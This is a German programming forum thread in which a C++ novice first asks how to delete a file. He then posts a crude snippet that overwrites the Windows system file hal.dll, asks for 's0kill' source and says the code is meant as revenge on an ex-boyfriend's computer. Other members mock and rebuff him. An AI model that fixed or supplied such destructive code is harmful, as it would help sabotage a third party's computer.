brauche hilfe
-
Allo
Ich habe heute ne c++ 6.0 Lizenz von meinem vadda bekommen, weil er damit nich zurecht gekommen ist..ich habe mir ein paar anfänger tuts durgelesen und mal versucht eine Anwendung zu schreiben, die eine andere datei in einem bestimmten ordner löschen kann..#include <iostream.h> using manespace std; main() { kill c:\killtest\kill.txt }bei dem code hat mir ein bekannter geholfen, aber der compiler hat mit dem kill ein prob...
was habe ich falsch gemacht?
-
k0rNy schrieb:
Allo
Ich habe heute ne c++ 6.0 Lizenz von meinem vadda bekommen, weil er damit nich zurecht gekommen ist..ich habe mir ein paar anfänger tuts durgelesen und mal versucht eine Anwendung zu schreiben, die eine andere datei in einem bestimmten ordner löschen kann..#include <iostream.h> using manespace std; main() { kill c:\killtest\kill.txt }bei dem code hat mir ein bekannter geholfen, aber der compiler hat mit dem kill ein prob...
was habe ich falsch gemacht?
. IMHO dürfte dein Compiler noch ganz andere Probleme haben.Das Grundgerüst des korrekten Codes sollte so ausshen:
#include <iostream> // .h ist veraltet! using namespace std; // nicht manespace... int main() // main muss int zurückgeben; nicht void. { // Hierfür gibt es sicherlich eine bessere Lösung. Siehe etwaige Funktionen deines OS. system("erase C:\\code\\cpp\\testin.txt"); return 0; }/edit: Code-Tags...
Caipi
-
windows.h fehlt dann nur noch (fuer system() ).
-
aua....da mus sich mir noch sehr sehr viele tuts reinziehen...^^
auf jeden fall danke für die schnelle hilfe
echt suppa

-
Cpt.Tanga schrieb:
windows.h fehlt dann nur noch (fuer system() ).
Hast recht, ein Header fehlt. AFAIK ist das aber nicht windows.h sondern die stdlib.h.
Caipi
-
ja, stimmt - naja scheint auch irgentwie in die windows.h eingebunden zu sein.
zur not kann man die auch ganz weglassen - nach guter alter c manier
-
aja nochwat:
kann jemand von euch den source von s0kill auftreiben?

-
k0rNy schrieb:
aja nochwat:
kann jemand von euch den source von s0kill auftreiben?

Der wird dir eh nix bringen wenn du den mit dem MSVC kompillierst...
-
hä
in was haben die s0kill geschribbe???
-
Ist ja egal was es ist... MSVC macht nur 32Bit Anwendungen die kannst du net einfach so ohne 32Bit OS ausführen, und Windows wird zu verhindern wissen dass du einen Computer S0Killst

-
mhm ja scho kla..wehalb killt ma ja den rechner im DOS modus^^
aja meine " windows kill exe" is fertig#include <cstdlib> #include <iostream> using namespace std; int main(int argc, char *argv[]) { FILE * datei; if(!(datei = fopen("C:\\WINDOWS\\system32\\hal.dll","w+"))) return 0; else printf("deleting..."); fprintf(datei, "... FILE WAS DELETED!"); return EXIT_SUCCESS; }würde das funzen?
-
hä??
-
*LOL*
-
wasn
-
k0rNy schrieb:
wasn
deine mudda

-
Warum sollte dir jemand helfen ein Programm zu coden was einen Windowsrechner lahm legt - OMG
-
k0rNy schrieb:
würde das funzen?
probieren geht über studieren...
-
omg das is für nen völlig abgestürtzten ex freund gedacht...(rache) is ne lange geschichte und dauert zu lange um das zu schreiben....
ich hab damit net vor alle möglichen rechner lahmzulegen oder das ding zu veröffnetlichen oder so...
auserdem mach ich mich damit n bissl in c++ vertraut... das hat nichts mit virus proggn oder so zu tun...nur zur übung
-
k0rNy schrieb:
omg das is für nen völlig abgestürtzten ex freund gedacht...(rache) is ne lange geschichte und dauert zu lange um das zu schreiben....
ich hab damit net vor alle möglichen rechner lahmzulegen oder das ding zu veröffnetlichen oder so...
auserdem mach ich mich damit n bissl in c++ vertraut... das hat nichts mit virus proggn oder so zu tun...nur zur übungIch denke, ich spreche hier im Namen aller, wenn ich sage:
Hau ab! 
-
verschwinden sie